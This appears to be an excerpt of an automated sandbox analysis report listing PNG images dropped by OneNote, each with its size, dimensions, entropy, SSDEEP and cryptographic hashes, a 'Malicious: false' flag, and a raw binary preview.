                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
